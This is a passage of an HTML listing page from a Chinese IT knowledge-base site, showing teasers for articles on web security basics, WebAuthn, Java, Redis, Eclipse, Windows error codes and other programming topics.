href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a> <div>Web安全工程师概念基础一.了解黑客是如何工作的1.在虚拟机配置Linux系统2.漏洞测试工具3.msf控制台4.远程工具RATS5.远程访问计算机6.白帽二.技术基础漏斗扫描工具AWVSAWVS简介安装站点扫描扫码结果分析SitecrawlerHTTPEditorTargetfingerAuthenticationTeaterHTTPSnifferHTTPfuzzer网络安全审计工具:Nmap安</div> </li> <li><a href="/article/1828441153201074176.htm" title="Windows Edge浏览器对Web Authentication API的支持分析与实践应用" target="_blank">Windows Edge浏览器对Web Authentication API的支持分析与实践应用</a> <span class="text-muted">2402_85758936</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/edge/1.htm">edge</a> <div>随着网络技术的发展,Web安全认证方式也在不断进步。WebAuthenticationAPI(通常称为WebAuthn)是一个现代的Web标准,旨在提供更安全、更便捷的认证机制。它支持多种认证方式,包括生物识别技术、硬件令牌和手机认证等。WindowsEdge作为微软的现代浏览器,对WebAuthn的支持情况如何,以及如何在实际开发中应用这一API,是本文将要探讨的主题。WebAuthentica</div> </li> <li><a href="/article/1828362496986148864.htm" title="关于6种Web安全常见的攻防姿势" target="_blank">关于6种Web安全常见的攻防姿势</a> <span class="text-muted">AI大模型-搬运工</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a> <div>关于Web安全的问题,是一个老生常谈的问题,作为离用户最近的一层,我们大前端应该把手伸的更远一点。我们最常见的Web安全攻击有以下几种:XSS跨站脚本攻击CSRF跨站请求伪造URL跳转漏洞ClickJacking点击劫持/UI-覆盖攻击SQLInjectionSQL注入OSCommandInjectionOS命令注入一、XSSXSS(CrossSiteScript),中文是跨站脚本攻击;其原本缩写</div> </li> <li><a href="/article/110.htm" title="强大的销售团队背后 竟然是大数据分析的身影" target="_blank">强大的销售团队背后 竟然是大数据分析的身影</a> <span class="text-muted">蓝儿唯美</span> <a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90/1.htm">数据分析</a> <div>Mark Roberge是HubSpot的首席财务官,在招聘销售职位时使用了大量数据分析。但是科技并没有挤走直觉。 大家都知道数理学家实际上已经渗透到了各行各业。这些热衷数据的人们通过处理数据理解商业流程的各个方面,以重组弱点,增强优势。 Mark Roberge是美国HubSpot公司的首席财务官,HubSpot公司在构架集客营销现象方面出过一份力——因此他也是一位数理学家。他使用数据分析 </div> </li> <li><a href="/article/237.htm" title="Haproxy+Keepalived高可用双机单活" target="_blank">Haproxy+Keepalived高可用双机单活</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1/1.htm">负载均衡</a><a class="tag" taget="_blank" href="/search/keepalived/1.htm">keepalived</a><a class="tag" taget="_blank" href="/search/haproxy/1.htm">haproxy</a><a class="tag" taget="_blank" href="/search/%E9%AB%98%E5%8F%AF%E7%94%A8/1.htm">高可用</a> <div>我们的应用MyApp不支持集群,但要求双机单活(两台机器:master和slave): 1.正常情况下,只有master启动MyApp并提供服务 2.当master发生故障时,slave自动启动本机的MyApp,同时虚拟IP漂移至slave,保持对外提供服务的IP和端口不变 F5据说也能满足上面的需求,但F5的通常用法都是双机双活,单活的话还没研究过 服务器资源 10.7</div> </li> <li><a href="/article/364.htm" title="eclipse编辑器中文乱码问题解决" target="_blank">eclipse编辑器中文乱码问题解决</a> <span class="text-muted">0624chenhong</span> <a class="tag" taget="_blank" href="/search/eclipse%E4%B9%B1%E7%A0%81/1.htm">eclipse乱码</a> <div>使用Eclipse编辑文件经常出现中文乱码或者文件中有中文不能保存的问题,Eclipse提供了灵活的设置文件编码格式的选项,我们可以通过设置编码 格式解决乱码问题。在Eclipse可以从几个层面设置编码格式:Workspace、Project、Content Type、File 本文以Eclipse 3.3(英文)为例加以说明: 1. 设置Workspace的编码格式: Windows-&g</div> </li> <li><a href="/article/491.htm" title="基础篇--resources资源" target="_blank">基础篇--resources资源</a> <span class="text-muted">不懂事的小屁孩</span> <a class="tag" taget="_blank" href="/search/android/1.htm">android</a> <div>最近一直在做java开发,偶尔敲点android代码,突然发现有些基础给忘记了,今天用半天时间温顾一下resources的资源。 String.xml&nbsp;&nbsp;&nbsp; 字符串资源&nbsp;&nbsp; 涉及国际化问题&nbsp; http://www.2cto.com/kf/201302/190394.html&nbsp;&nbsp; string-array</div> </li> <li><a href="/article/618.htm" title="接上篇补上window平台自动上传证书文件的批处理问卷" target="_blank">接上篇补上window平台自动上传证书文件的批处理问卷</a> <span class="text-muted">酷的飞上天空</span> <a class="tag" taget="_blank" href="/search/window/1.htm">window</a> <div> @echo off : host=服务器证书域名或ip,需要和部署时服务器的域名或ip一致 ou=公司名称, o=公司名称 set host=localhost set ou=localhost set o=localhost set password=123456 set validity=3650 set salias=s</div> </li> <li><a href="/article/745.htm" title="企业物联网大潮涌动:如何做好准备?" target="_blank">企业物联网大潮涌动:如何做好准备?</a> <span class="text-muted">蓝儿唯美</span> <a class="tag" taget="_blank" href="/search/%E4%BC%81%E4%B8%9A/1.htm">企业</a> <div>物联网的可能性也许是无限的。要找出架构师可以做好准备的领域然后利用日益连接的世界。 尽管物联网(IoT)还很新,企业架构师现在也应该为一个连接更加紧密的未来做好计划,而不是跟上闸门被打开后的集成挑战。“问题不在于物联网正在进入哪些领域,而是哪些地方物联网没有在企业推进,” Gartner研究总监Mike Walker说。 Gartner预测到2020年物联网设备安装量将达260亿,这些设备在全</div> </li> <li><a href="/article/872.htm" title="spring学习——数据库(mybatis持久化框架配置)" target="_blank">spring学习——数据库(mybatis持久化框架配置)</a> <span class="text-muted">a-john</span> <a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a> <div>Spring提供了一组数据访问框架,集成了多种数据访问技术。无论是JDBC,iBATIS(mybatis)还是Hibernate,Spring都能够帮助消除持久化代码中单调枯燥的数据访问逻辑。可以依赖Spring来处理底层的数据访问。 mybatis是一种Spring持久化框架,要使用mybatis,就要做好相应的配置: 1,配置数据源。有很多数据源可以选择,如:DBCP,JDBC,aliba</div> </li> <li><a href="/article/999.htm" title="Java静态代理、动态代理实例" target="_blank">Java静态代理、动态代理实例</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/Java%E9%9D%99%E6%80%81%E4%BB%A3%E7%90%86/1.htm">Java静态代理</a> <div> 采用Java代理模式,代理类通过调用委托类对象的方法,来提供特定的服务。委托类需要实现一个业务接口,代理类返回委托类的实例接口对象。 按照代理类的创建时期,可以分为:静态代理和动态代理。 所谓静态代理: 指程序员创建好代理类,编译时直接生成代理类的字节码文件。 所谓动态代理: 在程序运行时,通过反射机制动态生成代理类。 &nbsp; 一、静态代理类实例: 1、Serivce.ja</div> </li> <li><a href="/article/1126.htm" title="Struts1与Struts2的12点区别" target="_blank">Struts1与Struts2的12点区别</a> <span class="text-muted">asia007</span> <a class="tag" taget="_blank" href="/search/Struts1%E4%B8%8EStruts2/1.htm">Struts1与Struts2</a> <div>1) 在Action实现类方面的对比:Struts 1要求Action类继承一个抽象基类;Struts 1的一个具体问题是使用抽象类编程而不是接口。Struts 2 Action类可以实现一个Action接口,也可以实现其他接口,使可选和定制的服务成为可能。Struts 2提供一个ActionSupport基类去实现常用的接口。即使Action接口不是必须实现的,只有一个包含execute方法的P</div> </li> <li><a href="/article/1253.htm" title="初学者要多看看帮助文档 不要用js来写Jquery的代码" target="_blank">初学者要多看看帮助文档 不要用js来写Jquery的代码</a> <span class="text-muted">百合不是茶</span> <a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/js/1.htm">js</a> <div>解析json数据的时候需要将解析的数据写到文本框中, &nbsp;出现了用js来写Jquery代码的问题; &nbsp; 1, JQuery的赋值 &nbsp;有问题 &nbsp; &nbsp;代码如下:&nbsp;data.username 表示的是: &nbsp;网易 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp; &nbsp;$(&quot;#use</div> </li> <li><a href="/article/1380.htm" title="经理怎么和员工搞好关系和信任" target="_blank">经理怎么和员工搞好关系和信任</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/%E5%9B%A2%E9%98%9F/1.htm">团队</a><a class="tag" taget="_blank" href="/search/%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86/1.htm">项目管理</a><a class="tag" taget="_blank" href="/search/%E7%AE%A1%E7%90%86/1.htm">管理</a> <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 产品经理应该有坚实的专业基础,这里的基础包括产品方向和产品策略的把握,包括设计,也包括对技术的理解和见识,对运营和市场的敏感,以及良好的沟通和协作能力。换言之,既然是产品经理,整个产品的方方面面都应该能摸得出门道。这也不懂那也不懂,如何让人信服?如何让自己懂?就是不断学习,不仅仅从书本中,更从平时和各种角色的沟通</div> </li> <li><a href="/article/1507.htm" title="如何为rich:tree不同类型节点设置右键菜单" target="_blank">如何为rich:tree不同类型节点设置右键菜单</a> <span class="text-muted">sunjing</span> <a class="tag" taget="_blank" href="/search/contextMenu/1.htm">contextMenu</a><a class="tag" taget="_blank" href="/search/tree/1.htm">tree</a><a class="tag" taget="_blank" href="/search/Richfaces/1.htm">Richfaces</a> <div>组合使用target和targetSelector就可以啦,如下: &lt;rich:tree id=&quot;ruleTree&quot; value=&quot;#{treeAction.ruleTree}&quot; var=&quot;node&quot; nodeType=&quot;#{node.type}&quot; selectionChangeListener=&qu</div> </li> <li><a href="/article/1634.htm" title="【Redis二】Redis2.8.17搭建主从复制环境" target="_blank">【Redis二】Redis2.8.17搭建主从复制环境</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a> <div>开始使用Redis2.8.17 Redis第一篇在Redis2.4.5上搭建主从复制环境,对它的主从复制的工作机制,真正的惊呆了。不知道Redis2.8.17的主从复制机制是怎样的,Redis到了2.4.5这个版本,主从复制还做成那样,Impossible is nothing! 本篇把主从复制环境再搭一遍看看效果,这次在Unbuntu上用官方支持的版本。 &nbsp; Ubuntu上安装Red</div> </li> <li><a href="/article/1761.htm" title="JSONObject转换JSON--将Date转换为指定格式" target="_blank">JSONObject转换JSON--将Date转换为指定格式</a> <span class="text-muted">白糖_</span> <a class="tag" taget="_blank" href="/search/JSONObject/1.htm">JSONObject</a> <div>项目中,经常会用JSONObject插件将JavaBean或List&lt;JavaBean&gt;转换为JSON格式的字符串,而JavaBean的属性有时候会有java.util.Date这个类型的时间对象,这时JSONObject默认会将Date属性转换成这样的格式: &nbsp; {&quot;nanos&quot;:0,&quot;time&quot;:-27076233600000,</div> </li> <li><a href="/article/1888.htm" title="JavaScript语言精粹读书笔记" target="_blank">JavaScript语言精粹读书笔记</a> <span class="text-muted">braveCS</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a> <div>【经典用法】: &nbsp; //①定义新方法 Function .prototype.method=function(name, func){ this.prototype[name]=func; return this; } //②给Object增加一个create方法,这个方法创建一个使用原对</div> </li> <li><a href="/article/2015.htm" title="编程之美-找符合条件的整数 用字符串来表示大整数避免溢出" target="_blank">编程之美-找符合条件的整数 用字符串来表示大整数避免溢出</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/1.htm">编程之美</a> <div> import java.util.LinkedList; public class FindInteger { /** * 编程之美 找符合条件的整数 用字符串来表示大整数避免溢出 * 题目:任意给定一个正整数N,求一个最小的正整数M(M&gt;1),使得N*M的十进制表示形式里只含有1和0 * * 假设当前正在搜索由0,1组成的K位十进制数</div> </li> <li><a href="/article/2142.htm" title="读书笔记" target="_blank">读书笔记</a> <span class="text-muted">chengxuyuancsdn</span> <a class="tag" taget="_blank" href="/search/%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/1.htm">读书笔记</a> <div>1、Struts访问资源 2、把静态参数传递给一个动作 3、&lt;result&gt;type属性 4、s:iterator、s:if c:forEach 5、StringBuilder和StringBuffer 6、spring配置拦截器 1、访问资源 (1)通过ServletActionContext对象和实现ServletContextAware,ServletReque</div> </li> <li><a href="/article/2269.htm" title="[通讯与电力]光网城市建设的一些问题" target="_blank">[通讯与电力]光网城市建设的一些问题</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/%E9%97%AE%E9%A2%98/1.htm">问题</a> <div> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 信号防护的问题,前面已经说过了,这里要说光网交换机与市电保障的关系 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 我们过去用的ADSL线路,因为是电话线,在小区和街道电力中断的情况下,只要在家里用笔记本电脑+蓄电池,连接ADSL,同样可以上网........ &nbsp;&nbsp;&nbsp;&nbsp</div> </li> <li><a href="/article/2396.htm" title="oracle 空间RESUMABLE" target="_blank">oracle 空间RESUMABLE</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E7%A9%BA%E9%97%B4%E4%B8%8D%E8%B6%B3/1.htm">空间不足</a><a class="tag" taget="_blank" href="/search/RESUMABLE/1.htm">RESUMABLE</a><a class="tag" taget="_blank" href="/search/%E9%94%99%E8%AF%AF%E6%8C%82%E8%B5%B7/1.htm">错误挂起</a> <div>空间RESUMABLE操作&nbsp; 转 Oracle从9i开始引入这个功能,当出现空间不足等相关的错误时,Oracle可以不是马上返回错误信息,并回滚当前的操作,而是将操作挂起,直到挂起时间超过RESUMABLE TIMEOUT,或者空间不足的错误被解决。 这一篇简单介绍空间RESUMABLE的例子。 第一次碰到这个特性是在一次安装9i数据库的过程中,在利用D</div> </li> <li><a href="/article/2523.htm" title="重构第一次写的线程池" target="_blank">重构第一次写的线程池</a> <span class="text-muted">dieslrae</span> <a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B%E6%B1%A0+python/1.htm">线程池 python</a> <div>最近没有什么学习欲望,修改之前的线程池的计划一直搁置,这几天比较闲,还是做了一次重构,由之前的2个类拆分为现在的4个类. 1、首先是工作线程类:TaskThread,此类为一个工作线程,用于完成一个工作任务,提供等待(wait),继续(proceed),绑定任务(bindTask)等方法 #!/usr/bin/env python # -*- coding:utf8 -*- </div> </li> <li><a href="/article/2650.htm" title="C语言学习六指针" target="_blank">C语言学习六指针</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/c/1.htm">c</a> <div>初识指针,简单示例程序: /* 指针就是地址,地址就是指针 地址就是内存单元的编号 指针变量是存放地址的变量 指针和指针变量是两个不同的概念 但是要注意: 通常我们叙述时会把指针变量简称为指针,实际它们含义并不一样 */ # include &lt;stdio.h&gt; int main(void) { int * p; // p是变量的名字, int * </div> </li> <li><a href="/article/2777.htm" title="yii2 beforeSave afterSave beforeDelete" target="_blank">yii2 beforeSave afterSave beforeDelete</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/delete/1.htm">delete</a> <div>public function afterSave($insert, $changedAttributes) { parent::afterSave($insert, $changedAttributes); if($insert) { //这里是新增数据 } else { //这里是更新数据 } } &nbsp</div> </li> <li><a href="/article/2904.htm" title="timertask" target="_blank">timertask</a> <span class="text-muted">shuizhaosi888</span> <a class="tag" taget="_blank" href="/search/timertask/1.htm">timertask</a> <div>java.util.Timer timer = new java.util.Timer(true); // true 说明这个timer以daemon方式运行(优先级低, // 程序结束timer也自动结束),注意,javax.swing // 包中也有一个Timer类,如果import中用到swing包, // 要注意名字的冲突。 TimerTask task = new</div> </li> <li><a href="/article/3031.htm" title="Spring Security(13)——session管理" target="_blank">Spring Security(13)——session管理</a> <span class="text-muted">234390216</span> <a class="tag" taget="_blank" href="/search/session/1.htm">session</a><a class="tag" taget="_blank" href="/search/Spring+Security/1.htm">Spring Security</a><a class="tag" taget="_blank" href="/search/%E6%94%BB%E5%87%BB%E4%BF%9D%E6%8A%A4/1.htm">攻击保护</a><a class="tag" taget="_blank" href="/search/%E8%B6%85%E6%97%B6/1.htm">超时</a> <div>session管理 目录 &nbsp; 1.1&nbsp;&nbsp;&nbsp;&nbsp; 检测session超时 1.2&nbsp;&nbsp;&nbsp;&nbsp; concurrency-control 1.3&nbsp;&nbsp;&nbsp;&nbsp; session 固定攻击保护 &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp</div> </li> <li><a href="/article/3158.htm" title="公司项目NODEJS实践0.3[ mongo / session ...]" target="_blank">公司项目NODEJS实践0.3[ mongo / session ...]</a> <span class="text-muted">逐行分析JS源代码</span> <a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a><a class="tag" taget="_blank" href="/search/session/1.htm">session</a><a class="tag" taget="_blank" href="/search/nodejs/1.htm">nodejs</a> <div>&nbsp; &nbsp; http://www.upopen.cn &nbsp; 一、前言 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;书接上回,我们搭建了WEB服务端路由、模板等功能,完成了register&nbsp;通过ajax与后端的通信,今天主要完成数据与mongodb的存取,实现注册&nbsp;/&nbsp;登录&nbsp;/</div> </li> <li><a href="/article/3285.htm" title="pojo.vo.po.domain区别" target="_blank">pojo.vo.po.domain区别</a> <span class="text-muted">LiaoJuncai</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/VO/1.htm">VO</a><a class="tag" taget="_blank" href="/search/POJO/1.htm">POJO</a><a class="tag" taget="_blank" href="/search/javabean/1.htm">javabean</a><a class="tag" taget="_blank" href="/search/domain/1.htm">domain</a> <div>  POJO = &quot;Plain Old Java Object&quot;,是MartinFowler等发明的一个术语,用来表示普通的Java对象,不是JavaBean, EntityBean 或者 SessionBean。POJO不但当任何特殊的角色,也不实现任何特殊的Java框架的接口如,EJB, JDBC等等。      即POJO是一个简单的普通的Java对象,它包含业务逻辑</div> </li> <li><a href="/article/3412.htm" title="Windows Error Code" target="_blank">Windows Error Code</a> <span class="text-muted">OhMyCC</span> <a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a> <div>0 操作成功完成. 1 功能错误. 2 系统找不到指定的文件. 3 系统找不到指定的路径. 4 系统无法打开文件. 5 拒绝访问. 6 句柄无效. 7 存储控制块被损坏. 8 存储空间不足, 无法处理此命令. 9 存储控制块地址无效. 10 环境错误. 11 试图加载格式错误的程序. 12 访问码无效. 13 数据无效. 14 存储器不足, 无法完成此操作. 15 系</div> </li> <li><a href="/article/3539.htm" title="在storm集群环境下发布Topology" target="_blank">在storm集群环境下发布Topology</a> <span class="text-muted">roadrunners</span> <a class="tag" taget="_blank" href="/search/%E9%9B%86%E7%BE%A4/1.htm">集群</a><a class="tag" taget="_blank" href="/search/storm/1.htm">storm</a><a class="tag" taget="_blank" href="/search/topology/1.htm">topology</a><a class="tag" taget="_blank" href="/search/spout/1.htm">spout</a><a class="tag" taget="_blank" href="/search/bolt/1.htm">bolt</a> <div>storm的topology设计和开发就略过了。本章主要来说说如何在storm的集群环境中,通过storm的管理命令来发布和管理集群中的topology。 &nbsp; 1、打包 打包插件是使用maven提供的maven-shade-plugin,详细见maven-shade-plugin。 &lt;plugin&gt; &lt;groupId&gt;org.apache.maven.</div> </li> <li><a href="/article/3666.htm" title="为什么不允许代码里出现“魔数”" target="_blank">为什么不允许代码里出现“魔数”</a> <span class="text-muted">tomcat_oracle</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>  在一个新项目中,我最先做的事情之一,就是建立使用诸如Checkstyle和Findbugs之类工具的准则。目的是制定一些代码规范,以及避免通过静态代码分析就能够检测到的bug。   迟早会有人给出案例说这样太离谱了。其中的一个案例是Checkstyle的魔数检查。它会对任何没有定义常量就使用的数字字面量给出警告,除了-1、0、1和2。   很多开发者在这个检查方面都有问题,这可以从结果</div> </li> <li><a href="/article/3793.htm" title="zoj 3511 Cake Robbery(线段树)" target="_blank">zoj 3511 Cake Robbery(线段树)</a> <span class="text-muted">阿尔萨斯</span> <a class="tag" taget="_blank" href="/search/%E7%BA%BF%E6%AE%B5%E6%A0%91/1.htm">线段树</a> <div> 题目链接:zoj 3511 Cake Robbery 题目大意:就是有一个N边形的蛋糕,切M刀,从中挑选一块边数最多的,保证没有两条边重叠。 解题思路:有多少个顶点即为有多少条边,所以直接按照切刀切掉点的个数排序,然后用线段树维护剩下的还有哪些点。 #include &lt;cstdio&gt; #include &lt;cstring&gt; #include &lt;vector&</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类:</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>